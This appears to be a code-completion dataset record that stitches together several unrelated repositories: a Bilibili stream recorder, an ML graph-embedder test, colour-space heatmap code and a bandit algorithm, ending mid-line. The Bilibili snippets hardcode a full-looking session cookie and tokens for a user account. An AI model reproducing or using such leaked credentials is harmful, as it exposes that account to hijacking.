CURRENT_QUALITY=116; SESSDATA=c555e98c%2C1711883936%2Caf616%2Aa2CjAD_KFN4n_1-0P_VrGmaHuTOhode3kKsjtR7Aq0iz1U5TFRzKUl69JUDZ-5W532pswSVkFKMUpyQkQ3NmlWYldjLWtnSG9hcG9lQ1RYa0VKaEh3TFlybGxjdlpJQkkwekYwYy0tckZhc1d3eWlrT1k2NHpvQmQtS1MtUGlxU2RxdEM2UFcyWWlnIIEC; bili_jct=f30d6a38050b9fd22f87748b88e5c40f; sid=8nj7ny5x; bili_ticket=eyJhbGciOiJIUzI1NiIsImtpZCI6InMwMyIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2OTY2MDgwNDYsImlhdCI6MTY5NjM0ODc4NiwicGx0IjotMX0.P976bqS0e1zm2k4khjnX5aqxWCmSIE-zA6MlVXq32wo; bili_ticket_expires=1696607986; fingerprint=c2d58d86c60e35d56558bf9942a9deac; CURRENT_FNVAL=4048; home_feed_column=5; browser_resolution=1699-945; share_source_origin=WEIXIN; bsource=share_source_weixinchat; bp_video_offset_325718681=849021837940621320; buvid_fp=c2d58d86c60e35d56558bf9942a9deac; b_lsid=5469973A_18B009161BC; PVID=1\",\n # 'referer': \"https://space.bilibili.com/353609978/\",\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47\"\n }\n response = requests.get(url=home_url, headers=headers)\n user_name = re.findall(r'<title>(.*?)的个人空间', response.text)[0]\n if user_name:\n return (user_name)\n else:\n return (\"未找到指定用户名称\")"
},
{
"identifier": "my_request",
"path": "api.py",
"snippet": "def my_request(url):\n headers = dict()\n headers['cookie'] = r\"buvid_fp_plain=undefined; CURRENT_BLACKGAP=0; blackside_state=0; LIVE_BUVID=AUTO2616596088417426; rpdid=|(k|m|))Y~k~0J'uYY)lmlul~; hit-new-style-dyn=1; go-back-dyn=1; is-2022-channel=1; header_theme_version=CLOSE; CURRENT_PID=b03f3c10-ceb5-11ed-b59d-47f8dacf4eec; FEED_LIVE_VERSION=V8; buvid3=103FCEA2-4D34-4196-5E7B-7321C8A1082118620infoc; b_nut=1690476718; _uuid=B1038F2AB-E8CD-29A2-4728-F82FE285F59D84428infoc; buvid4=CFCD8B8D-0FCC-F601-2753-DA825E11CFE613020-022072800-fr%2BgMSZdqRJTFAAYsS9ACQ%3D%3D; i-wanna-go-back=-1; b_ut=5; hit-dyn-v2=1; i-wanna-go-feeds=2; DedeUserID=325718681; DedeUserID__ckMd5=319313351948fd48; CURRENT_QUALITY=116; SESSDATA=c555e98c%2C1711883936%2Caf616%2Aa2CjAD_KFN4n_1-0P_VrGmaHuTOhode3kKsjtR7Aq0iz1U5TFRzKUl69JUDZ-5W532pswSVkFKMUpyQkQ3NmlWYldjLWtnSG9hcG9lQ1RYa0VKaEh3TFlybGxjdlpJQkkwekYwYy0tckZhc1d3eWlrT1k2NHpvQmQtS1MtUGlxU2RxdEM2UFcyWWlnIIEC; bili_jct=f30d6a38050b9fd22f87748b88e5c40f; sid=8nj7ny5x; bili_ticket=eyJhbGciOiJIUzI1NiIsImtpZCI6InMwMyIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2OTY2MDgwNDYsImlhdCI6MTY5NjM0ODc4NiwicGx0IjotMX0.P976bqS0e1zm2k4khjnX5aqxWCmSIE-zA6MlVXq32wo; bili_ticket_expires=1696607986; fingerprint=c2d58d86c60e35d56558bf9942a9deac; CURRENT_FNVAL=4048; home_feed_column=5; browser_resolution=1699-945; share_source_origin=WEIXIN; bsource=share_source_weixinchat; bp_video_offset_325718681=849021837940621320; buvid_fp=c2d58d86c60e35d56558bf9942a9deac; b_lsid=5469973A_18B009161BC; PVID=1\"\n headers['Accept-Encoding'] = 'identity'\n headers['referer'] = 'https://www.bilibili.com/video/BV1XF411C7xh/?spm_id_from=333.1007.tianma.1-3-3.click&vd_source=d4827c2f1802c9c5b667bc324c406c18'\n headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47'\n\n response = requests.get(url=url, headers=headers)\n return response.text"
}
] | import os
import json
import traceback
import sys
import re
import streamlink
import threading
import requests
import time
import datetime
import urllib
import socket
from api import is_live, get_stream_url, get_name, my_request
from urllib import request
| 3,539 |
socket.setdefaulttimeout(5.0)
def record(real_url, file_name, headers):
if not real_url:
return
res = None
try:
with urllib.request.urlopen(urllib.request.Request(real_url, headers=headers)) as response:
size = 0
with open(file_name, 'wb') as f:
print('starting download from:\n%s\nto:\n%s' %
(real_url, file_name))
chunk_size = 64*1024
while True:
chunk = response.read(chunk_size)
if not chunk:
print('连接中断')
break
f.write(chunk)
#size += len(chunk)
#print('{:<4.2f} MB downloaded'.format(
# size/1024/1024), datetime.datetime.now(), end="\r")
except Exception as e:
print("=============================")
print(e)
print("=============================")
finally:
print("finnally")
if res:
res.close()
print("res.close()")
if os.path.isfile(file_name) and os.path.getsize(file_name) == 0:
os.remove(file_name)
print("os.remove(file_name)")
def __main__(id,filename):
#conf = json.load(open("_config.json"))
_id = id
|
socket.setdefaulttimeout(5.0)
def record(real_url, file_name, headers):
if not real_url:
return
res = None
try:
with urllib.request.urlopen(urllib.request.Request(real_url, headers=headers)) as response:
size = 0
with open(file_name, 'wb') as f:
print('starting download from:\n%s\nto:\n%s' %
(real_url, file_name))
chunk_size = 64*1024
while True:
chunk = response.read(chunk_size)
if not chunk:
print('连接中断')
break
f.write(chunk)
#size += len(chunk)
#print('{:<4.2f} MB downloaded'.format(
# size/1024/1024), datetime.datetime.now(), end="\r")
except Exception as e:
print("=============================")
print(e)
print("=============================")
finally:
print("finnally")
if res:
res.close()
print("res.close()")
if os.path.isfile(file_name) and os.path.getsize(file_name) == 0:
os.remove(file_name)
print("os.remove(file_name)")
def __main__(id,filename):
#conf = json.load(open("_config.json"))
_id = id
| _name = get_name(int(_id))
| 2 | 2023-12-16 17:08:02+00:00 | 4k |
Angryrou/udao | udao/model/tests/embedders/test_base_graph_embedder.py | [
{
"identifier": "BaseGraphEmbedder",
"path": "udao/model/embedders/base_graph_embedder.py",
"snippet": "class BaseGraphEmbedder(BaseEmbedder, ABC):\n \"\"\"Base class for Embedder networks.\n Takes care of preparing the input features for the\n embedding layer, and normalizing the output embedding.\n\n Parameters\n ----------\n net_params : EmbedderParams\n \"\"\"\n\n @dataclass\n class Params(BaseEmbedder.Params):\n input_size: int # depends on the data\n \"\"\"The size of the input features, except for the type of operation.\n If type is provided, the input size is increased at init\n by the type embedding dimension.\n \"\"\"\n n_op_types: Optional[int] # depends on the data\n \"\"\"The number of operation types.\"\"\"\n op_groups: Sequence[str]\n \"\"\"The groups of operation features to be included in the embedding.\"\"\"\n type_embedding_dim: Optional[int]\n \"\"\"The dimension of the operation type embedding.\"\"\"\n embedding_normalizer: Optional[NormalizerType]\n \"\"\"Name of the normalizer to use for the output embedding.\"\"\"\n\n @classmethod\n def from_iterator_shape(\n cls,\n iterator_shape: UdaoEmbedItemShape[Dict[str, int]],\n **kwargs: Any,\n ) -> \"BaseGraphEmbedder\":\n embedding_input_shapes = iterator_shape.embedding_input_shape\n op_groups = [name for name in embedding_input_shapes.keys()]\n input_size = sum(\n [embedding_input_shapes[name] for name in op_groups if name != \"type\"]\n )\n n_op_types = None\n if \"type\" in op_groups:\n n_op_types = iterator_shape.embedding_input_shape[\"type\"]\n params_dict = {\n \"op_groups\": op_groups,\n \"n_op_types\": n_op_types,\n \"input_size\": input_size,\n **kwargs,\n }\n if any((name not in cls.Params.__dataclass_fields__) for name in params_dict):\n for name in params_dict:\n if name not in cls.Params.__dataclass_fields__:\n logger.debug(f\"{name} is not a valid parameter for {cls.__name__}\")\n raise ValueError(f\"Some parameters are not valid for {cls.__name__} Params\")\n return cls(cls.Params(**params_dict))\n\n def __init__(self, net_params: Params) -> None:\n super().__init__(net_params)\n self.input_size = net_params.input_size\n\n op_groups = net_params.op_groups\n self.op_type = \"type\" in op_groups\n self.op_cbo = \"cbo\" in op_groups\n self.op_enc = \"op_enc\" in op_groups\n if self.op_type:\n if net_params.n_op_types is None or net_params.type_embedding_dim is None:\n raise ValueError(\n \"n_op_types and type_embedding_dim must be provided \"\n \"if `type` is included in op_groups\"\n )\n self.op_embedder = nn.Embedding(\n net_params.n_op_types, net_params.type_embedding_dim\n )\n self.input_size += net_params.type_embedding_dim\n self.out_norm: Optional[nn.Module] = None\n if net_params.embedding_normalizer is None:\n self.out_norm = None\n elif net_params.embedding_normalizer == \"BN\":\n self.out_norm = nn.BatchNorm1d(self.embedding_size)\n elif net_params.embedding_normalizer == \"LN\":\n self.out_norm = nn.LayerNorm(self.embedding_size)\n elif net_params.embedding_normalizer == \"IsoBN\":\n self.out_norm = IsoBN(self.embedding_size)\n else:\n raise ValueError(net_params.embedding_normalizer)\n\n def concatenate_op_features(self, g: dgl.DGLGraph) -> th.Tensor:\n \"\"\"Concatenate the operation features into a single tensor.\n\n Parameters\n ----------\n g : dgl.DGLGraph\n Input graph\n\n Returns\n -------\n th.Tensor\n output tensor of shape (num_nodes, input_size)\n \"\"\"\n op_list = []\n if self.op_type:\n op_list.append(self.op_embedder(g.ndata[\"op_gid\"]))\n if self.op_cbo:\n op_list.append(g.ndata[\"cbo\"])\n if self.op_enc:\n op_list.append(g.ndata[\"op_enc\"])\n op_tensor = th.cat(op_list, dim=1) if len(op_list) > 1 else op_list[0]\n return op_tensor\n\n def normalize_embedding(self, embedding: th.Tensor) -> th.Tensor:\n \"\"\"Normalizes the embedding.\"\"\"\n if self.out_norm is not None:\n embedding = self.out_norm(embedding)\n return embedding"
},
{
"identifier": "generate_dgl_graph",
"path": "udao/model/tests/embedders/conftest.py",
"snippet": "def generate_dgl_graph(num_nodes: int, num_edges: int, features: dict) -> dgl.DGLGraph:\n u = th.tensor(range(num_edges))\n v = th.tensor(range(1, num_edges + 1))\n g = dgl.graph((u, v))\n for feat_name, props in features.items():\n if props[\"type\"] == \"float\":\n g.ndata[feat_name] = th.randn(num_nodes, props[\"size\"])\n elif props[\"type\"] == \"int\":\n g.ndata[feat_name] = th.randint(0, 3, (num_nodes, props[\"size\"]))\n if props[\"size\"] == 1:\n g.ndata[feat_name] = g.ndata[feat_name].squeeze() # type: ignore\n return g"
}
] | import pytest
import torch as th
from ...embedders.base_graph_embedder import BaseGraphEmbedder
from .conftest import generate_dgl_graph | 1,607 |
def test_base_embedder_initialization() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer="BN",
n_op_types=3,
)
embedder = BaseGraphEmbedder(params)
assert embedder.input_size == 10
assert embedder.embedding_size == 10
assert embedder.op_type
assert embedder.op_cbo
assert not embedder.op_enc
def test_base_embedder_invalid_normalizer() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer="UNKNOWN", # type: ignore
n_op_types=3,
)
with pytest.raises(ValueError):
BaseGraphEmbedder(params)
def test_base_embedder_concatenate_op_features() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer=None,
n_op_types=3,
)
embedder = BaseGraphEmbedder(params)
|
def test_base_embedder_initialization() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer="BN",
n_op_types=3,
)
embedder = BaseGraphEmbedder(params)
assert embedder.input_size == 10
assert embedder.embedding_size == 10
assert embedder.op_type
assert embedder.op_cbo
assert not embedder.op_enc
def test_base_embedder_invalid_normalizer() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer="UNKNOWN", # type: ignore
n_op_types=3,
)
with pytest.raises(ValueError):
BaseGraphEmbedder(params)
def test_base_embedder_concatenate_op_features() -> None:
params = BaseGraphEmbedder.Params(
input_size=5,
output_size=10,
op_groups=["type", "cbo"],
type_embedding_dim=5,
embedding_normalizer=None,
n_op_types=3,
)
embedder = BaseGraphEmbedder(params) | g = generate_dgl_graph( | 1 | 2023-12-20 09:10:42+00:00 | 4k |
SnailForce/SIM-Net | models/texture_model/heatmap_detector.py | [
{
"identifier": "Hourglass",
"path": "models/spatial_model/util.py",
"snippet": "class Hourglass(nn.Module):\n \"\"\"\n Hourglass architecture.\n \"\"\"\n\n def __init__(self, block_expansion, in_features, num_blocks=3, max_features=256):\n super(Hourglass, self).__init__()\n self.encoder = Encoder(block_expansion, in_features, num_blocks, max_features)\n self.decoder = Decoder(block_expansion, in_features, num_blocks, max_features)\n self.out_filters = self.decoder.out_filters\n\n def forward(self, x):\n return self.decoder(self.encoder(x))"
},
{
"identifier": "make_coordinate_grid",
"path": "models/spatial_model/util.py",
"snippet": "def make_coordinate_grid(spatial_size, type):\n \"\"\"\n Create a meshgrid [-1,1] x [-1,1] of given spatial_size.\n \"\"\"\n h, w = spatial_size\n x = torch.arange(w).type(type)\n y = torch.arange(h).type(type)\n\n x = (2 * (x / (w - 1)) - 1)\n y = (2 * (y / (h - 1)) - 1)\n\n yy = y.view(-1, 1).repeat(1, w)\n xx = x.view(1, -1).repeat(h, 1)\n\n meshed = torch.cat([xx.unsqueeze_(2), yy.unsqueeze_(2)], 2)\n\n return meshed"
},
{
"identifier": "AntiAliasInterpolation2d",
"path": "models/spatial_model/util.py",
"snippet": "class AntiAliasInterpolation2d(nn.Module):\n \"\"\"\n Band-limited downsampling, for better preservation of the input signal.\n \"\"\"\n def __init__(self, channels, scale):\n super(AntiAliasInterpolation2d, self).__init__()\n sigma = (1 / scale - 1) / 2\n kernel_size = 2 * round(sigma * 4) + 1\n self.ka = kernel_size // 2\n self.kb = self.ka - 1 if kernel_size % 2 == 0 else self.ka\n\n kernel_size = [kernel_size, kernel_size]\n sigma = [sigma, sigma]\n # The gaussian kernel is the product of the\n # gaussian function of each dimension.\n kernel = 1\n meshgrids = torch.meshgrid(\n [\n torch.arange(size, dtype=torch.float32)\n for size in kernel_size\n ]\n )\n for size, std, mgrid in zip(kernel_size, sigma, meshgrids):\n mean = (size - 1) / 2\n kernel *= torch.exp(-(mgrid - mean) ** 2 / (2 * std ** 2))\n\n # Make sure sum of values in gaussian kernel equals 1.\n kernel = kernel / torch.sum(kernel)\n # Reshape to depthwise convolutional weight\n kernel = kernel.view(1, 1, *kernel.size())\n kernel = kernel.repeat(channels, *[1] * (kernel.dim() - 1))\n\n self.register_buffer('weight', kernel)\n self.groups = channels\n self.scale = scale\n inv_scale = 1 / scale\n self.int_inv_scale = int(inv_scale)\n\n def forward(self, input):\n if self.scale == 1.0:\n return input\n\n out = F.pad(input, (self.ka, self.kb, self.ka, self.kb))\n out = F.conv2d(out, weight=self.weight, groups=self.groups)\n out = out[:, :, ::self.int_inv_scale, ::self.int_inv_scale]\n\n return out"
},
{
"identifier": "kp2gaussian",
"path": "models/spatial_model/util.py",
"snippet": "def kp2gaussian(kp, spatial_size, kp_variance):\n \"\"\"\n Transform a keypoint into gaussian like representation\n \"\"\"\n mean = kp['value']\n\n coordinate_grid = make_coordinate_grid(spatial_size, mean.type())\n number_of_leading_dimensions = len(mean.shape) - 1\n shape = (1,) * number_of_leading_dimensions + coordinate_grid.shape\n coordinate_grid = coordinate_grid.view(*shape)\n repeats = mean.shape[:number_of_leading_dimensions] + (1, 1, 1)\n coordinate_grid = coordinate_grid.repeat(*repeats).to(mean.device)\n\n # Preprocess kp shape\n shape = mean.shape[:number_of_leading_dimensions] + (1, 1, 2)\n mean = mean.view(*shape)\n\n mean_sub = (coordinate_grid - mean)\n out = torch.exp(-0.5 * (mean_sub ** 2).sum(-1) / kp_variance)\n\n return out"
}
] | from numpy.core.fromnumeric import mean
from torch import nn
from ..spatial_model.util import Hourglass, make_coordinate_grid, AntiAliasInterpolation2d,kp2gaussian
import torch
import torch.nn.functional as F
import numpy as np | 3,295 | ycbcr_image = torch.where(ycbcr_image < 0.06275,torch.ones_like(ycbcr_image) * 0.06275,ycbcr_image)
bs,c,h,w = ycbcr_image.shape
ycbcr_image = ycbcr_image.view(bs,c,-1)
transform_matrix = self.transform_matrix_inv.type(ycbcr_image.type())
shift_matrix = self.shift_matrix_inv.type(ycbcr_image.type())
rgb_image = torch.matmul(transform_matrix.unsqueeze(0),ycbcr_image) - shift_matrix.unsqueeze(0).unsqueeze(-1)
rgb_image = torch.where(rgb_image > 1,torch.ones_like(rgb_image),rgb_image)
rgb_image = torch.where(rgb_image < 0,torch.zeros_like(rgb_image),rgb_image)
return rgb_image.reshape(bs,c,h,w)
def rgb2lab(self,rgb_image):
transform_matrix = torch.tensor([[0.3811, 0.5783, 0.0402],
[0.1967, 0.7244, 0.0782],
[0.0241, 0.1288, 0.8444]])
transform_matrix = transform_matrix.type(rgb_image.type())
bs,c,h,w = rgb_image.shape
rgb_image = rgb_image.view(bs,c,-1)
lab_image = torch.matmul(transform_matrix.unsqueeze(0),rgb_image)
lab_image = torch.log(lab_image)
matrix_1 = torch.tensor([[1 / np.sqrt(3),0,0],
[0,1 / np.sqrt(6),0],
[0,0,1/np.sqrt(2)]])
matrix_2 = torch.tensor([[1.0,1,1],
[1,1,-2],
[1,-1,0]])
matrix = torch.matmul(matrix_1,matrix_2)
matrix = matrix.type(rgb_image.type())
return torch.matmul(matrix.unsqueeze(0),lab_image).reshape(bs,c,h,w)
def lab2rgb(self,lab_image):
transform_matrix = torch.tensor([[4.4679 ,3.5873 ,0.1193],
[-1.2186, 2.3809, 0.1624],
[0.0497, 0.2439, 1.2045]])
transform_matrix = transform_matrix.type(lab_image.type())
matrix_1 = torch.tensor([[ np.sqrt(3) / 3,0,0],
[0,np.sqrt(6) / 6,0],
[0,0,np.sqrt(2) / 2]])
matrix_2 = torch.tensor([[1.0,1,1],
[1,1,-1],
[1,-2,0]])
matrix = torch.matmul(matrix_2,matrix_1)
matrix = matrix.type(lab_image.type())
bs,c,h,w = lab_image.shape
lab_image = lab_image.view(bs,c,-1)
rgb_image= torch.matmul(matrix.unsqueeze(0),lab_image)
rgb_image = torch.pow(10,rgb_image)
return torch.matmul(transform_matrix.unsqueeze(0),rgb_image).reshape(bs,c,h,w)
def weighted_mean(self,values,weighted,dim=-1):
return torch.sum(values * weighted,dim) / (torch.sum(weighted,dim) + 1e-8)
def weighted_mean_std(self,values,weighted,dim=-1):
mean = self.weighted_mean(values,weighted)
return mean,torch.sqrt(self.weighted_mean((values - mean.unsqueeze(-1))**2,weighted,dim) + 1e-8)
def create_code(self,source_image,source_heatmaps):
bs, c, h, w = source_image.shape
source_repeat = source_image.unsqueeze(1).repeat(1, self.num_kp, 1, 1,1)
source_repeat_flatten = source_repeat.view((bs,self.num_kp,c,-1))
source_heatmaps_flatten = source_heatmaps.view((bs,self.num_kp,1,-1))
source_mean,source_std = self.weighted_mean_std(source_repeat_flatten,source_heatmaps_flatten)
source_std = source_std.unsqueeze(-1).unsqueeze(-1) + 1e-8
source_mean = source_mean.unsqueeze(-1).unsqueeze(-1)
source_image_code = (source_repeat - source_mean) / source_std
return source_image_code,source_mean,source_std
def create_transformed_source_image(self, source_image, target_image, source_heatmaps,target_heatmaps,common_heaatmaps):
"""
Eq 7. in the paper \hat{T}_{s<-d}(z)
"""
bs, c, h, w = source_image.shape
source_image = source_image.clone()
source_image[:,:3] = self.rgb2ycbcr(source_image[:,:3])
target_image = target_image.clone()
target_image[:,:3] = self.rgb2ycbcr(target_image[:,:3])
source_image_code,_,_ = self.create_code(source_image,source_heatmaps)
target_image_code,target_mean,target_std = self.create_code(target_image,target_heatmaps)
target_image_code = self.create_deformed_source_image(target_image_code,self.sparse_motion)
source_weight = self.weight * 1000
target_weight = (1 - self.weight) * 1000
transformed_image_code = target_image_code.clone()
transformed_image_code[:,:,0]= (source_image_code[:,:,0] * source_weight + target_image_code[:,:,0] * target_weight) / (source_weight + target_weight + 1e-8)
transformed_image = transformed_image_code * target_std + target_mean
return transformed_image
def create_deformed_source_image(self, source_image, sparse_motions):
"""
Eq 7. in the paper \hat{T}_{s<-d}(z)
"""
if len(source_image.shape) == 5:
bs, _,_, h, w = source_image.shape
source_repeat = source_image.clone()
else:
bs, _, h, w = source_image.shape
source_repeat = source_image.unsqueeze(1).unsqueeze(1).repeat(1, self.num_kp + 1, 1, 1, 1, 1)
source_repeat = source_repeat.view(bs * (self.num_kp + 1), -1, h, w)
sparse_motions = sparse_motions.contiguous().view((bs * (self.num_kp + 1), h, w, -1))
sparse_deformed = F.grid_sample(source_repeat, sparse_motions, padding_mode = 'zeros')
sparse_deformed = sparse_deformed.view((bs, self.num_kp + 1 , -1, h, w))
return sparse_deformed
def create_sparse_motions(self, source_image, kp_driving, kp_source):
bs, _, h, w = source_image.shape
|
class DenseNetwork(nn.Module):
"""
Module that predicting a dense motion from sparse motion representation given by kp_source and kp_driving
"""
def __init__(self, block_expansion, num_blocks, max_features, num_kp, num_channels,
scale_factor=1, kp_variance=0.01):
super(DenseNetwork, self).__init__()
self.hourglass = Hourglass(block_expansion=block_expansion, in_features=(num_kp + 1) * (num_channels + 1),
max_features=max_features, num_blocks=num_blocks)
self.mask = nn.Conv2d(self.hourglass.out_filters, num_kp + 1, kernel_size=(7, 7), padding=(3, 3))
self.num_kp = num_kp
self.scale_factor = scale_factor
self.kp_variance = kp_variance
self.transform_matrix = torch.tensor([[0.257, 0.564, 0.098],
[-0.148, -0.291, 0.439],
[0.439, -0.368, -0.071]])
self.shift_matrix = torch.tensor([16.0, 128.0, 128.0]) / 255
self.shift_matrix.type(self.transform_matrix.type())
self.transform_matrix_inv = self.transform_matrix.inverse()
self.shift_matrix_inv = torch.matmul(self.transform_matrix_inv,self.shift_matrix)
if self.scale_factor != 1:
self.down = AntiAliasInterpolation2d(num_channels, self.scale_factor)
self.weight = 0.2
def create_heatmap_representations(self, spatial_size, kp):
heatmap = kp2gaussian(kp, spatial_size=spatial_size, kp_variance=self.kp_variance)
#adding background feature
zeros = torch.zeros(heatmap.shape[0], 1, spatial_size[0], spatial_size[1]).type(heatmap.type())
heatmap = torch.cat([zeros, heatmap], dim=1)
heatmap = heatmap.unsqueeze(2)
return heatmap
def rgb2ycbcr(self,rgb_image):
bs,c,h,w = rgb_image.shape
rgb_image = rgb_image.view(bs,c,-1)
transform_matrix = self.transform_matrix.type(rgb_image.type())
shift_matrix = self.shift_matrix.type(rgb_image.type())
ycbcr_image = torch.matmul(transform_matrix.unsqueeze(0),rgb_image) + shift_matrix.unsqueeze(0).unsqueeze(-1)
return ycbcr_image.reshape(bs,c,h,w)
def ycbcr2rgb(self,ycbcr_image):
ycbcr_image[:,1:] = torch.where(ycbcr_image[:,1:] > 0.94118,torch.ones_like(ycbcr_image[:,1:]) * 0.94118,ycbcr_image[:,1:])
ycbcr_image[:,0] = torch.where(ycbcr_image[:,0] > 0.92157,torch.ones_like(ycbcr_image[:,0]) * 0.92157,ycbcr_image[:,0])
ycbcr_image = torch.where(ycbcr_image < 0.06275,torch.ones_like(ycbcr_image) * 0.06275,ycbcr_image)
bs,c,h,w = ycbcr_image.shape
ycbcr_image = ycbcr_image.view(bs,c,-1)
transform_matrix = self.transform_matrix_inv.type(ycbcr_image.type())
shift_matrix = self.shift_matrix_inv.type(ycbcr_image.type())
rgb_image = torch.matmul(transform_matrix.unsqueeze(0),ycbcr_image) - shift_matrix.unsqueeze(0).unsqueeze(-1)
rgb_image = torch.where(rgb_image > 1,torch.ones_like(rgb_image),rgb_image)
rgb_image = torch.where(rgb_image < 0,torch.zeros_like(rgb_image),rgb_image)
return rgb_image.reshape(bs,c,h,w)
def rgb2lab(self,rgb_image):
transform_matrix = torch.tensor([[0.3811, 0.5783, 0.0402],
[0.1967, 0.7244, 0.0782],
[0.0241, 0.1288, 0.8444]])
transform_matrix = transform_matrix.type(rgb_image.type())
bs,c,h,w = rgb_image.shape
rgb_image = rgb_image.view(bs,c,-1)
lab_image = torch.matmul(transform_matrix.unsqueeze(0),rgb_image)
lab_image = torch.log(lab_image)
matrix_1 = torch.tensor([[1 / np.sqrt(3),0,0],
[0,1 / np.sqrt(6),0],
[0,0,1/np.sqrt(2)]])
matrix_2 = torch.tensor([[1.0,1,1],
[1,1,-2],
[1,-1,0]])
matrix = torch.matmul(matrix_1,matrix_2)
matrix = matrix.type(rgb_image.type())
return torch.matmul(matrix.unsqueeze(0),lab_image).reshape(bs,c,h,w)
def lab2rgb(self,lab_image):
transform_matrix = torch.tensor([[4.4679 ,3.5873 ,0.1193],
[-1.2186, 2.3809, 0.1624],
[0.0497, 0.2439, 1.2045]])
transform_matrix = transform_matrix.type(lab_image.type())
matrix_1 = torch.tensor([[ np.sqrt(3) / 3,0,0],
[0,np.sqrt(6) / 6,0],
[0,0,np.sqrt(2) / 2]])
matrix_2 = torch.tensor([[1.0,1,1],
[1,1,-1],
[1,-2,0]])
matrix = torch.matmul(matrix_2,matrix_1)
matrix = matrix.type(lab_image.type())
bs,c,h,w = lab_image.shape
lab_image = lab_image.view(bs,c,-1)
rgb_image= torch.matmul(matrix.unsqueeze(0),lab_image)
rgb_image = torch.pow(10,rgb_image)
return torch.matmul(transform_matrix.unsqueeze(0),rgb_image).reshape(bs,c,h,w)
def weighted_mean(self,values,weighted,dim=-1):
return torch.sum(values * weighted,dim) / (torch.sum(weighted,dim) + 1e-8)
def weighted_mean_std(self,values,weighted,dim=-1):
mean = self.weighted_mean(values,weighted)
return mean,torch.sqrt(self.weighted_mean((values - mean.unsqueeze(-1))**2,weighted,dim) + 1e-8)
def create_code(self,source_image,source_heatmaps):
bs, c, h, w = source_image.shape
source_repeat = source_image.unsqueeze(1).repeat(1, self.num_kp, 1, 1,1)
source_repeat_flatten = source_repeat.view((bs,self.num_kp,c,-1))
source_heatmaps_flatten = source_heatmaps.view((bs,self.num_kp,1,-1))
source_mean,source_std = self.weighted_mean_std(source_repeat_flatten,source_heatmaps_flatten)
source_std = source_std.unsqueeze(-1).unsqueeze(-1) + 1e-8
source_mean = source_mean.unsqueeze(-1).unsqueeze(-1)
source_image_code = (source_repeat - source_mean) / source_std
return source_image_code,source_mean,source_std
def create_transformed_source_image(self, source_image, target_image, source_heatmaps,target_heatmaps,common_heaatmaps):
"""
Eq 7. in the paper \hat{T}_{s<-d}(z)
"""
bs, c, h, w = source_image.shape
source_image = source_image.clone()
source_image[:,:3] = self.rgb2ycbcr(source_image[:,:3])
target_image = target_image.clone()
target_image[:,:3] = self.rgb2ycbcr(target_image[:,:3])
source_image_code,_,_ = self.create_code(source_image,source_heatmaps)
target_image_code,target_mean,target_std = self.create_code(target_image,target_heatmaps)
target_image_code = self.create_deformed_source_image(target_image_code,self.sparse_motion)
source_weight = self.weight * 1000
target_weight = (1 - self.weight) * 1000
transformed_image_code = target_image_code.clone()
transformed_image_code[:,:,0]= (source_image_code[:,:,0] * source_weight + target_image_code[:,:,0] * target_weight) / (source_weight + target_weight + 1e-8)
transformed_image = transformed_image_code * target_std + target_mean
return transformed_image
def create_deformed_source_image(self, source_image, sparse_motions):
"""
Eq 7. in the paper \hat{T}_{s<-d}(z)
"""
if len(source_image.shape) == 5:
bs, _,_, h, w = source_image.shape
source_repeat = source_image.clone()
else:
bs, _, h, w = source_image.shape
source_repeat = source_image.unsqueeze(1).unsqueeze(1).repeat(1, self.num_kp + 1, 1, 1, 1, 1)
source_repeat = source_repeat.view(bs * (self.num_kp + 1), -1, h, w)
sparse_motions = sparse_motions.contiguous().view((bs * (self.num_kp + 1), h, w, -1))
sparse_deformed = F.grid_sample(source_repeat, sparse_motions, padding_mode = 'zeros')
sparse_deformed = sparse_deformed.view((bs, self.num_kp + 1 , -1, h, w))
return sparse_deformed
def create_sparse_motions(self, source_image, kp_driving, kp_source):
bs, _, h, w = source_image.shape | identity_grid = make_coordinate_grid((h, w), type=kp_source['value'].type()) | 1 | 2023-12-16 12:49:10+00:00 | 4k |
DURUII/Replica-AUCB | emulator.py | [
{
"identifier": "AUCB",
"path": "algorithms/aucb.py",
"snippet": "class AUCB(BaseAlgorithm):\n def __init__(self, arms: list[StrategicArm], n_arms: int, n_selected: int, budget: float):\n super().__init__(arms, n_arms, n_selected, budget)\n # β_i(t), count for how many times each arm is selected\n # r̄_i(t),empirical mean reward for each arm\n self.beta, self.r_bar = np.zeros(n_arms), np.zeros(n_arms)\n\n def initialize(self):\n \"\"\" Select all arms at the very beginning. \"\"\"\n\n # Mask to select all arms in the first round (ϕ^1 = N, Line 1)\n mask = np.ones(self.N)\n\n # Observe the reward values r^1_i for all arms, just like a God (Line 2)\n omni = self.omniscience()\n\n # Determine the payments for selected arms (p^t_i) assuming maximum cost (c_max) (Line 3)\n p = mask * StrategicArm.c_max\n\n # Update empirical mean reward (r̄_i(t)) and count of selections (β_i(t)) for each arm (Line 4)\n self.r_bar = ((self.r_bar * self.beta + omni) / (self.beta + np.ones(self.N))) * mask + self.r_bar * (1 - mask)\n self.beta += mask\n\n # Update total reward (R) (Line 4)\n self.R += np.sum(omni * mask)\n\n # Update budget (B) after payments (Line 4)\n self.B -= np.sum(p)\n\n def run(self):\n # Bids of each arm (b_i)\n b = np.array([arm.b for arm in self.arms])\n\n while True:\n # Increment the round counter (t) (Line 5)\n self.t += 1\n\n # Calculate UCB values for each arm (r̂_i(t-1)) (Equation 8)\n # TODO Review this Equation, because it is incompatible with code in BanditsBook\n u = np.sqrt((self.K + 1) * (np.log(self.t - 1)) / self.beta)\n r_hat = self.r_bar + u\n\n # Sort and select the top K arms based on the rules (Line 